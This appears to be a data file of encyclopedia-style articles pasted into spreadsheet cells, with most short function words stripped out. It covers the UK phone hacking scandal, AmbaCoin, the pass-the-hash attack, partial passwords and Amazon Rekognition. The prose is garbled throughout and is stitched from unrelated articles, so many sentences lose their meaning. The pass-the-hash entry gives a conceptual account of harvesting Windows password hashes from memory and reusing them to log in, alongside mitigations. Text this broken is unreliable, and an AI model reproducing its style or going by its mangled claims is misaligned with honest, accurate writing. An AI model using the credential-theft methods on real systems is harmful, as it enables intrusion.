2006 inquiry goodmans activities. home affairs committee began another inquiry september 2010 later published report highly critical met, stating, "the difficulties offered justifying failure investigate further, nothing suggested real tackle overcome obstacles." guardian continued critical yates, responded hiring firm libel lawyers, paid met, threaten legal action anyone claimed misled parliament. eventually, celebrities politicians continued asking victims hacking, yates directed evidence mulcaire raid, stored bags three years, finally entered computer database. people assigned task. yates look evidence saying later, "i’m going look bags. supposed assistant commissioner." re-open investigation. days settlement gordon taylor revealed guardian july 2009, clifford, another eight victims named 2006, announced intentions sue. march 2010, news international agreed settle suit £1,000,000, much greater expected settlement hacking clifford's phone issue. these awards encouraged victims explore legal redress, resulting phone hacking queries metropolitan police, often slow respond commentator observed "the goodman-mulcaire revelations subsequent prosecution supposed settled hacking matter forever might done that, except successful suits... kept popping news world convictions." guardian december 2010 report december 2010, guardian reported documents seized glenn mulcaire 2006 metropolitan police service recently disclosed open court, implied news world editor edmondson specifically instructed mulcaire hack voice messages sienna miller, jude law, several others. documents also implied mulcaire engaged news world chief reporter neville thurlbeck assistant editor greg miskiw, worked directly editor andy coulson. this contradicted testimony culture, media sport committee news international executives senior officials evidence hacking anyone mulcaire goodman. within five weeks article appearing, edmondson suspended news world, andy coulson resigned chief press secretary david cameron, crown prosecution service began review evidence had, renewed investigation phone hacking, something previously declined january–june 2011: admission liability operation weeting begins metropolitan police announced january 2011 would begin investigation phone hacking, following receipt "significant information" regarding conduct news world employees. operation weeting would take place alongside previously announced review phone hacking evidence crown prosecution service. between officers began looking 11,000 pages evidence seized mulcaire august 2006.in june 2011, issue computer hacking addressed launch operation tuleta. having failed thus phone hacking issue rest, news international's firm, hickman rose, hired former director public prosecutions macdonald review emails news international executives used basis claim news world clive goodman involved phone hacking. macdonald immediately concluded, regardless whether others involved, clear evidence criminal activity, including payments serving police officers. macdonald arranged evidence turned met, opening july 2011 operation elveden, investigation focused bribery corruption within met's ranks. first arrests part operation weeting made april 2011. edmondson news world's chief reporter neville thurlbeck arrested suspicion unlawfully intercepting voicemail messages. both denied participating illegal activities. paper's assistant news editor, james weatherup, taken custody questioning metropolitan police april 2011. also dealt major fiscal issues, "managing huge budgets" "crisis management" newspaper.the guardian, referring information commissioner's report 2006, queried metropolitan police chose exclude large quantity material relating jonathan rees scope operation weeting inquiry. news world said made extensive rees' investigative services, including phone hacking, paying £150,000 year. basis evidence obtained operation nigeria, rees found guilty december 2000 attempting pervert course justice received seven-year prison sentence. after released prison news world, editorship andy coulson, began commissioning rees' services again.the guardian journalist nick davies described commissions news world "golden source" income rees' "empire corruption", involved network contacts corrupt police officers pattern illegal behaviour extending beyond phone hacking. despite detailed evidence, metropolitan police failed pursue effective in-depth investigations rees' corrupt relationship news world decade.on july 2011, metropolitan police deputy assistant commissioner akers told home affairs committee chairman keith police contacted 3,870 people named glenn mulcaire's files date. apology compensation news international announced april 2011 would admit liability breach privacy cases brought relation phone hacking news world. company offered unreserved apology compensation eight claimants, would continue contest allegations made litigants.the eight claimants identified media reports sienna miller, actress kelly hoppen, interior designer miller's stepmother tessa jowell, member parliament former cabinet minister david mills, lawyer jowell's former husband andy gray, sports pundit former footballer joan hammell, aide former deputy prime minister john prescott andrew, sports talent agent nicola phillips, assistant publicist cliffordat time news international's announcement, individuals process taking legal action news world breach privacy grounds. comic actor steve coogan reported suspected victims phone hacking.hoppen lodged claim news world reporters, evans, "accessing attempting access voicemail messages june 2009, march 2010". news international admitted liability relation claim.on april, tessa jowell former husband david mills, andy gray, andrew, nicola phillips, joan hammell, kelly hoppen received official apology compensation, actor leslie john prescott, also claimed breach privacy, not.scottish politician danny alexander predicted arrests would made. shadow secretary state wales peter hain called legal authorities conduct "full proper public investigation" claimed police investigation "tardy".the first individual accept news world's apology compensation actress sienna miller, received £100,000 plus legal costs. sports pundit andy gray followed june, accepting payout £20,000 plus legal costs. prior settlements, individuals' litigation claims identified phone hacking "test cases" heard january 2012. reported 2011 senior news world executive implicated, according actor jude law's barrister high court. this report also said number people whose phones hacked much larger previously thought. high court said told "notebooks belonging private investigator hired news group newspapers contained thousands mobile phone numbers" "police also found individual personal identification numbers almost unique voicemail numbers used access voice mail".in january 2012 reported respect politician george galloway, time, settled court. galloway begun legal proceedings breach privacy 2010 told probably targeted mulcaire. terms settlement disclosed. galloway said apology cynical attempt protect rebekah brooks. april, observer reported claims former minister rupert murdoch tried persuade prime minister gordon brown early 2010 help resisting attempts labour peers investigate affair, easy news world run-up uk's general election 2010. news international described report "total rubbish"; spokesperson brown declined comment. july 2011: allegations milly dowler's voicemail first reported guardian july 2011 police found evidence suggesting private investigator glenn mulcaire collected personal information family missing surrey teenager milly dowler, following disappearance march 2002 discovery body months later. according paper, journalists working news world hired private investigators hack dowler's voicemail inbox shortly disappearance. alleged deleted messages, giving false hope police dowler's family, thought might deleted messages therefore might still alive potentially destroying valuable evidence abduction evidence potential abductor murderer. levi bellfield convicted murder weeks revelations already convicted murders attempted murder took place milly's disappearance discovery body. later established dowler's phone deleted messages automatically, hours listened guardian commented news world conceal readers article april 2002 intercepted telephone messages also informed surrey police fact march 2002, days milly went missing.in july 2011, announced dowler family preparing claim damages news world. news group newspapers described allegation development great concern". reacting revelation, prime minister david cameron said alleged hacking, true, "truly dreadful". added police ought pursue "vigorous" investigation ascertain taken place. leader opposition miliband called rebekah brooks, news world's editor 2002, chief executive news international, "consider conscience consider position". brooks denied knowledge phone hacking editorship.it wake dowler allegations significant number people, including former deputy prime minister john prescott politicians, began seriously question whether takeover bskyb news corporation vetoed appropriate government authorities. media standards trust formed pressure group hacked off, campaign public inquiry. soon launch, campaign gained support suspected hacking victim, actor hugh grant, became public spokesperson, appearing question time newsnight.in january 2012, revealed surrey police discovered early stages inquiries news world staff accessed amanda dowler's mobile phone messages take issue this. instead, senior surrey officer invited news world staff meeting discuss case. british soldiers' relatives july 2011, daily telegraph reported voicemail accounts relatives british soldiers killed action iraq since 2003 afghanistan since 2001 eavesdropped news world. personal details phone numbers belonging relatives dead service personnel found glen mulcaire's files. response allegations, royal british legion announced would suspend ties news world, dropping newspaper campaigning partner. london attack victims sixth anniversary july 2005 london bombings, reported relatives victims telephones snooped news world aftermath attacks. lost children bombings told police officers investigating phone hacking warned contact details found target list, former firefighter helped rescue injured passengers also said contacted police looking hacking allegations. number survivors bombings revealed police warned phones hacked messages intercepted; cases advised change security codes pins. sara payne july, guardian reported news world hacked voicemail media campaigner sara payne, whose seven-year-old daughter, sarah payne, murdered west sussex paedophile whiting, july 2000. this news arguably even public outrage dowler revelations, given prominent role rebekah brooks news world played passage sarah's law, changed offender laws sara payne active campaigner favour laws news international media charity organisations since daughter's death. brooks developed long-standing friendship sara payne years daughter's death; payne wrote column praising news world's support sarah's final issue, writing paper's staff "supported darkest, difficult times life became trusted friends". brooks used sarah's campaign defend news world questioned culture, media sport committee. scotland yard reportedly found materials pertaining payne glenn mulcaire's notes. they also discovered payne's voicemail mobile phone given brooks, ostensibly help keep touch supporters. brooks issued statement denying news world aware mulcaire's targeting payne, saying idea "unthinkable". payne said "absolutely devastated deeply disappointed" disclosure. other victims some email messages discovered suggesting jonathan rees made requests sums around £1,000 contact details senior members royal family friends.former deputy prime minister john prescott claimed knew "direct evidence" indicating sunday times involved illegal news gathering activities. former prime minister gordon brown alleged bank account accessed sunday times 2000, gained private medical records son, fraser, cystic fibrosis. rebekah brooks telephoned brown tell going reveal diagnosed cystic fibrosis tried persuade spoil newspaper's exclusive announcing first. guardian later front-page story accusing improperly obtaining medical records brown's son, later forced issue apology upon discovering information came member public.other victims hacking included former metropolitan police assistant commissioner john yates, revealed january 2011 phone hacked 2004 2005. phone chat show host paul o'grady also hacked news world suffered heart attack 2006.in 2012 reported billionaire robert agostinelli targeted private detective named steve whitamore working rupert murdoch's newspaper gain confidential information pertaining agostinelli's business affairs evidence brought light fact high-profile citizens targeted private investigators within rupert murdoch's empire. this revealed information commissioner's office raided steve whittamore's offices subsequently convicted illegally trading personal information.in july 2011 reported mark stephens group high-profile lawyers victim "news international phone hacking scandal".mary ellen field, former business manager model elle macpherson, lost field accused leaking confidential information news world, published story macpherson's split arpad busson. field realised voicemails could intercepted glenn mulcaire admitted court accessing macpherson's phones.a cousin jean charles menezes, brazilian shot dead police mistook fugitive suspected involvement july 2005 attempted bombings london, also phone hacked news world menezes's death. spokesperson justice4jean campaign group said: "the menezes family deeply pained find phones hacked time vulnerable bereaved."carole caplin, former fitness adviser prime minister tony blair, announced metropolitan police told mobile phone probably hacked, dating back 2002 along milly dowler case year, earliest cases discovered. aftermath closure news world closure news world years print, first significant effect scandal. days leading july 2011, virgin holidays, co-operative group, ford motor company general motors (owner vauxhall motors) pulled advertisements news world response unfolding controversy. several major advertisers also considered same.james murdoch announced july 2011 years print news world would publish last-ever edition july, loss jobs. news corporation said profits final edition would good causes. downing street said role decision. james murdoch conceded paper "sullied behaviour wrong", saying recent allegations true, inhuman place company."other executives company said phone hacking widespread previously believed co-operating investigations allegations. editor rebekah brooks told staff meeting, recognised following internal investigation "other shoes would drop", phrase indicating revelations wrongdoing would follow.there immediate speculation news international would launch sunday edition replace sister paper news world. sunday launched february 2012. bskyb takeover withdrawn rupert murdoch announced july 2011 news corporation withdrawing proposal take full control subscription television broadcaster bskyb, concerns ongoing furore. announcement made hours house commons debate motion, supported major parties, calling news corporation withdraw proposal. symbolic gesture house later passed motion unanimously acclamation. york state contract lost subsidiary news corporation week august 2011, wireless generation, subsidiary news corporation, lost no-bid contract york state build information system, tracking student performance consequence news international phone hacking scandal. citing, "... vendor responsibility issues parent company wireless generation," state comptroller thomas dinapoli said revelations surrounding news corporation made final approval contract "untenable". resignations number senior employees executives resigned news international parent company, emergence allegations, along high-ranking officers metropolitan police service. news international's legal manager crone left company july. part role publisher, crone served news world's chief lawyer gave evidence parliamentary committees, uncovered evidence phone hacking beyond criminal offences committed royal editor clive goodman. maintained internal report suggesting phone hacking paper went beyond goodman.on july, rebekah brooks, chief executive news international, quit following widespread criticism role controversy. statement, brooks said desire remain bridge made focal point debate" stated would "concentrate correcting distortions rebutting allegations record". exit welcomed political leaders. prime minister david cameron's office said departure "the right decision", leader opposition milib</t>
  </si>
  <si>
    <t>AmbaCoin</t>
  </si>
  <si>
    <t>ambacoin official cryptocurrency ambazonia. ambacoin worth cents (usd), francs. said backed "rich natural resources" breakaway region. ambacoin launched 2018 december 2018 2019. ambazonian government claims profits towards independence struggle humanitarian aid. references</t>
  </si>
  <si>
    <t>Pass the hash</t>
  </si>
  <si>
    <t>computer security, pass hash hacking technique allows attacker authenticate remote server service using underlying ntlm lanman hash user's password, instead requiring associated plaintext password normally case. replaces need stealing plaintext password gain access stealing hash. attack exploits implementation weakness authentication protocol, password hashes remain static session session password next changed. this technique performed server service accepting ntlm authentication, whether runs machine windows, unix, operating system. description systems services using ntlm authentication, users' passwords never sent cleartext wire. instead, provided requesting system, like domain controller, hash response challenge–response authentication scheme.native windows applications users cleartext password, call apis like lsalogonuser convert password hash values (the hashes) send remote server ntlm authentication.if attacker hashes user's password, need cleartext password; simply hash authenticate server impersonate user. words, attacker's perspective, hashes functionally equivalent original passwords generated from. history pass hash technique originally published paul ashton 1997 consisted modified samba client accepted user password hashes instead cleartext passwords. later versions samba third-party implementations ntlm protocols also included functionality. this implementation technique based stack created third-party (e.g., samba others), reason suffered series limitations hacker's perspective, including limited partial functionality: protocol continued evolve years, means third parties creating implementation protocol need implement changes additions protocol introduced newer versions windows (historically reverse engineering, complex time-consuming). this means even performing ntlm authentication successfully using pass hash technique, tools like samba's client might implemented functionality attacker might want use. this meant difficult attack windows programs dcom rpc. also, attackers restricted using third-party clients carrying attacks, possible built-in windows applications, like net.exe active directory users computers tool amongst others, asked attacker user enter cleartext password authenticate, corresponding password hash value. 2008, hernan ochoa published tool called "pass-the-hash toolkit" allowed 'pass hash' performed natively windows. allowed user name, domain name, password hashes cached memory local security authority changed runtime user authenticated made possible 'pass hash' using standard windows applications, thereby undermine fundamental authentication mechanisms built operating system. tool also introduced technique allowed dumping password hashes cached memory lsass.exe process (not persistent storage disk), quickly became widely used penetration testers (and attackers). this hash harvesting technique advanced previously used techniques (e.g. dumping local security accounts manager database (sam) using pwdump similar tools), mainly hash values stored memory could include credentials domain users (and domain administrators) logged machine. example, hashes authenticated domain users stored persistently local also dumped. this makes possible penetration tester attacker) compromise whole windows domain compromising single machine member domain. furthermore, attack implemented instantaneously without requirement expensive computing resources carry brute force attack. this toolkit subsequently superseded "windows credential editor", extends original tool's functionality operating system support. some antivirus vendors classify toolkit malware. hash harvesting before attacker carry pass-the-hash attack, must obtain password hashes target user accounts. end, penetration testers attackers harvest password hashes using number different methods: cached hashes credentials users previously logged onto machine (for example console rdp) read anyone administrator-level privileges. default behavior caching hashes credentials offline disabled administrators, technique always work machine sufficiently hardened. dumping local user's account database (sam). this database contains user accounts local particular machine compromised. example, domain environment, database machine contain domain users, users local machine likely useful authenticate services domain. however, local administrative account passwords used across multiple systems attacker remotely access systems using local user account hashes. sniffing ntlm challenge–response dialogues client servers, later brute-forcing captured encrypted hashes (since hashes obtained encrypted, necessary perform brute-force attack obtain actual hashes). dumping authenticated users' credentials stored windows memory lsass.exe process. credentials dumped include domain users administrators, logged rdp. this technique therefore used obtain credentials user accounts local compromised computer, rather originate security domain machine member mitigations system using ntlm authentication combination communication protocol (smb, ftp, rpc, http etc.) risk attack. exploit difficult defend against, possible exploits windows applications running windows used attacker elevate privileges carry hash harvesting facilitates attack. furthermore, require machine windows domain configured correctly missing security patch attacker find wide range penetration testing tools furthermore available automate process discovering weakness machine. there single defense technique, thus standard defense depth practices apply example firewalls, intrusion prevention systems, 802.1x authentication, ipsec, antivirus software, reducing number people elevated privileges, pro-active security patching etc. preventing windows storing cached credentials limit attackers obtaining hashes memory, usually means target account must logged machine attack executed. allowing domain administrators systems compromised untrusted create scenario administrators' hashes become targets attackers; limiting domain administrator logons trusted domain controllers therefore limit opportunities attacker. principle least privilege suggests least user access (lua) approach taken, users accounts privileges necessary complete task hand. configuring systems ntlm also strengthen security, newer exploits able forward kerberos tickets similar way. limiting scope debug privileges system frustrate attacks inject code steal hashes memory sensitive processes.restricted admin mode windows operating system feature introduced 2014 security bulletin 2871997, designed reduce effectiveness attack. also reflection attack metasploit project smbrelay mimikatz notes references external links microsoft pass hash mitigation guidance amplia security smbshell patrick jungles al.: mitigating pass-the-hash (pth) attacks other credential theft techniques, microsoft corp., 2012, retrieved feb. 2015 uninformed break-the-hash paper reducing effectiveness pass-the-hash(nsa) cwe-836: password hash instead password authentication</t>
  </si>
  <si>
    <t>News media phone hacking scandal reference lists</t>
  </si>
  <si>
    <t>news media phone hacking scandal controversy illegal acquisition confidential information news media organizations reportedly occurred united kingdom, united states australia 1995 2011. this article includes reference lists various topics relating scandal. overview topics these lists organized according topics shown blue type. 2002, practice publications using private investigators acquire confidential information widespread, individuals using illegal methods. victims illegal methods included celebrities, politicians, enforcement officials, solicitors, ordinary citizens. illegal activity became apparent, arrests made convictions achieved. upon learning privacy violated, victims retained solicitors filed suit news media companies agents, cases receiving financial payments violation privacy. successful suits publicity investigative news articles disclosures, including names victims, documentary evidence wrongdoing, admissions wrongdoing, potentially related payments. allegations made poor judgement cover news media executives enforcement officials. result, investigations initiated several senior executives police officials resigned. there also significant commercial consequences scandal.individuals included lists reportedly involved victims, perpetrators, investigators, solicitors, responsible oversight officials phone hacking scandal. illegal acquisition information allegedly accomplished accessing private voicemail accounts, hacking computers, making false statements officials obtain confidential information, entrapment, blackmail, burglaries, theft mobile phones making payments officials exchange confidential information. kind information acquired illegally include private communication, physical location individuals, bank account records, medical records, phone bills, files, organizational strategies.there evidence illegal acquisition confidential information continued least 2010. solicitors representing victims targeted surveillance news organizations sued recently 2011.for narrative regarding background status scandal, also: news media phone hacking scandal news international phone hacking scandal news corporation scandal victims narrative individuals included list victims below, wikipedia pages and: list alleged victims news international phone hacking scandal news international phone hacking scandal victims, apologies, compensation, arrests surveillance targets these lists individuals targeted surveillance beyond simple phone hacking news media organizations. some targeted simply acquire information developing story others vocal critics news media companies targeted obtain information influence criminal investigations, civil suits, parliamentary hearings. critics news media organizations this list includes serving police officer, solicitors clients suing news international, member parliament. dates parenthesis indicate approximate date surveillance initiated. cook, david; (june 2002) while investigating jonathan rees fillery connection 1987 murder daniel morgan, metropolitan police detective chief superintendent cook reportedly became surveillance target glenn mulcaire, working news world. fillery reportedly used relationship alex marunchak news world arrange mulcaire obtain cook's home address, internal payroll number metropolitan police, date birth figures amount wife paying mortgage. surveillance cook also reported involved physically following young children, attempts access voicemail wife, possibly attempts send "trojan horse" email attempt steal information computer. documents reportedly possession scotland yard shows "mulcaire instructions greg miskiw, paper's assistant editor close friend marunchak." attempts also appear made open letters left cook's external postbox, indicating "possible attempt pervert course justice." rebekah brooks, editor news world, aware surveillance. watson, tom; (september 2009) watson odds news international since 2006, quit government minister signed letter demanding tony blair resign prime minister. rebekah brooks, editor news international's sun, reportedly stated would forgive would pursue watson rest life. watson found targeted, strangers going rubbish harassing family. member culture, media sport select committee, confronted news international executives critical observations probing questions. while committee holding hearings leading formal report phone hacking, three unnamed news international executives arranged watson surveillance private investigator former policeman, derek webb. lewis, mark; (may 2010) while lewis representing claimants news world phone hacking, parent company, news international, hired derek webb lewis family surveillance. this reportedly part attempt gather evidence false smears private life thereby interfere ability represent clients. attempt discredit solicitors also intended protect reputation andy coulson, formerly editor news world subsequently became head communications conservative party senior media adviser prime minister david cameron. dossier including video taken ex-wife daughter given crone, senior legal manager news international. james murdoch executive chairman company time. lewis told leveson inquiry "news international sought destroy life, nearly succeeded." harris, charlotte; (january 2011) like mark lewis, harris also came surveillance agent news international representing clients suing company relation phone hacking news world." pursuit evidence clients disclosure information reportedly resulted firing edmondson news world resignation prime minister's media adviser, andy coulson. also like lewis, family followed video-taped, dossier given news international's crone. private investigator, derek webb, asked establish harris affair someone turned never met. over years, news international engaged webb target people. other surveillance targets november 2011, channel news disclosed list people upon private investigator derek webb reportedly asked news world carry surveillance 2003 2011. listed celebrities, politicians public figures. excluded list seem ordinary members public. civil suits solicitors this alphabetical list solicitors involved phone hacking scandal. alleged victims phone hacking list alleged victims phone hacking includes solicitors. society noted would serious offence hacking done intention affecting judicial outcomes. kirsty brimelow; prominent criminal barrister represented clients rape murder trials. harris, charlotte; solicitor representing alleged victims phone hacking lewis, mark; solicitor representing many alleged victims phone hacking including milly dowler's family stephens, mark; solicitor whose clients included james hewitt, allegedly affair princess diana, wikileaks founder julian assange. winskell, robin; sports attorney represented prominent footballers disciplinary trials, fifa arbritrations, libel cases. representing victims illegal acquisition confidential information tamsin allen; charlotte harris; partner london firm mishcon reya represented clifford, received £400,000 news world. misrepresented advanced payment stories. they also paid harris's costs. harris gone numerous individuals hacking claims. steven heffer, partner head media privacy london firm collyer bristow llp, acted victims. mark lewis; solicitor professional footballers' association 2005, lewis realized news world using phone hacking basis story concerning gordon taylor. 2008, lewis became first solicitor bring claim client relating phone hacking went settlement newspaper phone hacking. taylor received £700,000. while represent clients news international, company hired private investigator lewis family surveillance. lewis lost position george davies solicitors l.l.p firm want involved suits. 2011 lewis acted family milly dowler achieving record million deal. joined taylor hampton solicitors london. lewis represented claimants news world newspapers explored filing phone hacking suits gerald shamash; david sherborne; mark stephens; partner london firm finers stephens innocent representing tranche claimants, settled pre-trial. reportedly representing dozen claimants tranche mark thomson; among others, represented siobhain mcdonagh relation invasion privacy allegedly associated attempts agents break codes necessary access information stolen mobile phone. hugh tomlinson; barrister, advised high court around september 2012 people applied disclosure phone-hacking evidence met, phone-hacking claims accepted news international compensation fund, something claims would forthcoming. chris waters, head dispute resolution london firm malletts represents former boxing world champion chris eubank ex-wife karron stephen-martin news international hacking claims. waters also acts numerous victims claims news international.in 2011 group formed claimant's solicitors. addition harris lewis, several solicitors brought claims including tamsin allen, mark thomson gerald shamash. allen claimant group's first co-ordinator, thomson took allen settled claims. there several solicitors involved group, including mark stephens. otherwise involved phone hacking scandal lawrence abramson; solicitor harbottle lewis, abramson sent letter 2007 stating h&amp;l's review emails provided news international indicate involvement phone hacking clive goodman. this letter subsequently used news international executives maintain goodman single "rogue reporter." when lord kenneth macdonald reviewed emails july 2011, reported "evidence serious criminal offences" including payments police. pike, julian; partner farrer represented news group newspapers subsidiary news international 2008 settlement negotiations leading payment £425,000 plus costs gordon taylor. pike told culture, media sport committee october 2011 informed news international evidence suggesting powerful case" could made three news world journalists illegally accessed confidential information. news international maintained 2009 clive goodman involved. pike also told committee colin myler james murdoch 2008, pike received copy evidence emailed crone myler. this meeting addition myler's meeting murdoch crone june 2008. pike reported earlier senior news international personnel misled parliament professional obligations client. farrer also represents queen elizabeth 2011, pike advised news international mark lewis charlotte harris surveillance representing clients suing company. result, families followed video-taped. pike continued characterize apparent attempt find information discredit opposing solicitors "unusual" "justified" "would tomorrow," even news international acknowledged "deeply inappropriate." farrer also wrote lewis threatening enjoin accepting clients wanted news world phone hacking. pike also discussed possibility news international's legal affairs manager, crone, making charges professional misconduct lewis harris. lewis told leveson inquiry "news international sought destroy life, nearly succeeded." payments publications mentioned report this list newspapers magazines listed information commissioner's office (ico) report 2006 titled what price privacy?. publications listed order number pieces data paid private investigator for. this report presented learned investigation named operation motorman, begun 2002. "information commissioner richard thomas revealed hundreds journalists illegally bought private information named list newspapers magazines using particular information agency... numerous invoices [were found] addressed newspapers magazines detailed prices providing journalists personal information here table listing [name publication] followed number pieces data paid number journalists involved." publications publishers associated newspapers; publisher daily mail express newspapers; publisher daily star daily express guardian news media; publisher guardian observer mirror group newspapers (mgn); publisher daily mirror sunday mirror news international; publisher sun, times news world telegraph media group; publisher telegraph sunday telegraph individuals acknowledging confidential information acquired illegally this chronological list individuals acknowledged acquiring confidential information illegally first-hand experience, alleged practice widespread news media companies. dates parentheses indicates approximately individual made admission. december 2010, guardian reported journalists worked news world told guardian, york times channel dispatches "illegal activity assisted private investigators commonplace well known executives, including andy coulson." coulson denied knowledge phone hacking editor news world. individuals acknowledging illegally acquired confidential informationsteve whittamore; (april 2005) private investigator john boyael; (april 2005) private investigator alan king; (april 2005) retired police officer civilian communications officer paul marshall; (april 2005) leigh, david; (2006) assistant editor guardian clive goodman; (2007) royal correspondent news world glenn mulcaire; (2007) private investigator sean hoare; (september 2010) entertainment journalist news world paul mcmullan; (september 2010) senior journalist news worldindividuals alleging illegal acquisition confidential information widespread piers morgan; (2007) former editor daily mirror, former editor news world, former show business editor stated "loads newspaper journalists clive goodman, news world reporter, made scapegoat widespread practice." david brown; (2007) former reporter people alleged "reporters publisher's sunday newspaper regularly used phone hacking information first half last decade." trinity mirror publishes mirror sunday mirror, called claims unsubstantiated allegations disgruntled, dismissed employee. andrew neil; former editor sunday times former writer daily mail; claimed phone hacking "was systemic throughout news world, lesser extent sun." sharon marshall; (2010) entertainment journalist, formerly editor news world contributor sun. "author book 'tabloid girl' said hacking widespread news world tabloids." "sharon marshall named witnessed hacking working coulson 2002-04. industry-wide thing," said." james hipwell; july 2011) former business journalist daily mirror [unnamed sunday mirror sources]; july 2011) claims "techniques routine, used news desk, designated reporters, virtually every day." [unnamed york times sources]; dozen former reporters said interviews hacking pervasive news world. “everyone knew,” longtime reporter said. 'the office knew'...andy coulson talked freely colleagues dark arts, including hacking. 'i’ve dozens hundreds meetings andy' subject came said former editor... when coulson would story came from, editors would reply, 'we’ve pulled phone records' 'i’ve listened phone messages.' individuals worked news international police this alphabetical list individuals various times worked news international metropolitan police service. andy hayman essex police 1978 1998, transferred metropolitan police service. became chief constable norfolk constabulary 2002 returned february 2005. hayman charge royal household/goodman inquiry 2006. resigned december 2007 investigation reportedly lavish entertainment expenditures "long lunches dinners news world journalists time newspaper investigation phone hacking." months later hired news international, wrote article times defending police investigation led, maintaining “perhaps handful” hacking victims. alex marunchak worked freelance ukrainian language interpreter metropolitan police service 1980 2000 also executive news world, worked 1981 2006. provide "interpretation translation services victims, witnesses suspects crime speak english." marunchak regular customer private investigator jonathan rees, reportedly purchasing information improper sources. evidence became public marunchak journalists committed criminal offences aware rees acquired information. marunchak reportedly arranged glenn mulcaire, work news world, conduct surveillance detective investigating rees partner,sid fillery, murder. john stevens, baron stevens kirkwhelpington commissioner 2000 2005. credited reopening communication news media police predecessor, paul condon closed mid-1990s anti-corruption drive scotland yard. after retiring, wrote column news world. autobiography, stated "worked hard foster good relations newspapers made 'available' editors including rebekah brooks (then wade) andy coulson, news world." diary, record meetings news international executives february 2000 january 2005, went missing found october 2011 scotland yard. march 2011, chairman security firm axiom international. neil wallis worked news international 1987 1998 2003 2009. started public relations firm, chamy media, provided "strategic communication advice support" part-time basis october 2009 september 2010. wallis's firm paid £24,000 time wallis received £25,000 news international providing “crime exclusives” using details investigations. wallis arrested july 2011 suspicion conspiring intercept communications also july, independent police complaints commission began inquiry "whether john yates used position help wallis's daughter scotland yard. investigations narrative regarding investigations list, also articles specific metropolitan police operations and: metropolitan police role phone hacking scandal news world phone hacking scandal investigations news international phone hacking scandal- investigations news international phone hacking scandal- renewed investigations attempted suicides march 2012, reuters reported senior journalists working sun, newspaper owned news international, appeared attempted suicide face ongoing investigations relating phone hacking scandal. time, eleven current former staff members arrested suspicion bribing police civil servants information. commercial consequences arrests additional narrative regarding arrests list, also: news international phone hacking scandal- further arrests charged crimes convictions evidentiary documents newspaper articles press releases media coverage also leveson inquiry list people related news international phone hacking scandal metropolitan police role news international phone hacking scandal news corporation scandal news international phone hacking scandal news media phone hacking scandal news world phone hacking scandal investigations news world royal phone hacking scandal operation elveden operation kalmyk operation motorman (ico investigation) operation rubicon operation tuleta operation weeting wikipedia articles timelines metropolitan police role phone hacking scandal timeline news international phone hacking scandal timeline timeline news corporation scandal references</t>
  </si>
  <si>
    <t>Partial password</t>
  </si>
  <si>
    <t>partial password mode password authentication intended make keystroke logging shoulder surfing less effective.by asking user enter specific characters password, rather whole password, partial passwords help protect user password theft. part password revealed becomes difficult obtain password using techniques keystroke logging shoulder surfing. paper david aspinall mike just describes partial password implementations attacks detailed study.tested 110,000 simulations using passwords longer characters long, junade noted: passwords revealed entirety logins, logins. using dataset 488,129 breached passwords, tested 3-character password segments valid password database. additionally, could associated password passwords. verifying partial passwords considered good practice store passwords plaintext. instead, checking whole password, common store result passing password cryptographic hash function. user supply whole password, cannot verified stored digest whole password. some suggested storing digest combination letters could requested, note results generating storing large amount digests. better solution terms storage space security using secret sharing scheme. references</t>
  </si>
  <si>
    <t>Amazon Rekognition</t>
  </si>
  <si>
    <t>amazon rekognition cloud-based software service (saas) computer vision platform launched 2016. sold used number united states government agencies, including u.s. immigration customs enforcement (ice) orlando, florida police, well private entities. capabilities rekognition provides number computer vision capabilities, divided categories: algorithms pre-trained data collected amazon partners, algorithms user train custom dataset. july 2019, rekognition provides following computer vision capabilities. pre-trained algorithms celebrity recognition images facial attribute detection images, including gender, range, emotions (e.g. happy, calm, disgusted), whether face beard mustache, whether face eyeglasses sunglasses, whether eyes open, whether mouth open, whether person smiling, location several markers pupils line. people pathing enables tracking people video. advertised use-case capability track sports players post-game analysis. text detection classification images unsafe visual content detection algorithms user train custom dataset searchfaces enables users import database images pre-labeled faces, train machine learning model database, expose model cloud service api. then, user post images receive information faces image. used expose number capabilities, including identifying faces known people, comparing faces, finding similar faces database. face-based user verification history 2017 late 2017, washington county, oregon sheriff's office began using rekognition identify suspects' faces. rekognition marketed general-purpose computer vision tool, engineer working washington county decided tool facial analysis suspects. rekognition offered department free, washington county became first enforcement agency known rekognition. 2018, agency logged 1,000 facial searches. county, according washington post, 2019 paying month searches. relationship unknown public 2018. 2018, rekognition also used help identify celebrities royal wedding telecast. 2018 april 2018, reported familysearch using rekognition enable users "see ancestors resemble based family photographs". early 2018, also began using pilot program analyzing video surveillance.in 2018, reported aclu orlando, florida running pilot using rekognition facial analysis enforcement, pilot ending july 2019. after report, june 2018, gizmodo reported amazon workers written letter jeff bezos requesting cease selling rekognition enforcement, particularly homeland security. letter also sent bezos aclu. june 2018, reported orlando police force ceased using rekognition trial contract expired, reserving right future. orlando police department said "never gotten point test images" infrastructure bandwidth.in july 2018, aclu released test showing rekognition falsely matched members congress mugshot photos, particularly congresspeople color. house members afterwards sent letter bezos, expressing concern rekognition. amazon responded saying rekognition test generated percent confidence, recommended enforcement matches rated percent confidence. washington post states oregon instead officers pick "best five" result, instead adhering recommendation.in september 2018, reported mapillary using rekognition read text parking signs (e.g. stopping, parking, specific parking hours) cities.in october 2018, reported amazon earlier year pitched rekognition u.s. immigration customs enforcement agency. amazon defended government rekognition.on december 2018, reported democratic lawmakers said letter amazon "failed provide sufficient answers" rekognition, writing "serious concerns type product significant accuracy issues, places disproportionate burdens communities color, could stifle americans' willingness exercise first amendment rights public." 2019 january 2019, researchers published peer-reviewed study asserting rekognition difficulty identifying dark-skinned females competitors microsoft. study, rekognition misidentified darker-skinned women time, made mistakes light-skinned men. amazon called report "misinterpreted results" research improper "default confidence threshold."in january 2019, amazon's shareholders "urged amazon stop selling rekognition software enforcement agencies." amazon response defended rekognition, supported federal oversight guidelines "make sure facial recognition technology cannot used discriminate." february 2019, reported amazon collaborating national institute standards technology (nist) developing standardized tests improve accuracy remove bias facial recognition.in march 2019, open letter regarding rekognition sent group prominent researchers amazon, criticizing sale enforcement around signatures.in april 2019, amazon told securities exchange commission vote shareholder proposals seeking limit rekognition. amazon argued proposals "insignificant public policy issue company" related amazon's ordinary business, appeal denied. vote may. first proposal tabled shareholders. 2019, 2.4% shareholders voted stop selling rekognition government agencies, second proposal calling study rekognition civil rights 27.5% support.in august 2019, aclu used rekognition members government, lawmakers california flagged matches mugshots. amazon stated aclu "misusing" software tests, dismissing results meet amazon's recommended accuracy threshold 99%. august 2019, protests ice's rekognition surveil immigrants.in march 2019, amazon announced rekognition update would improve emotional detection, august 2019, 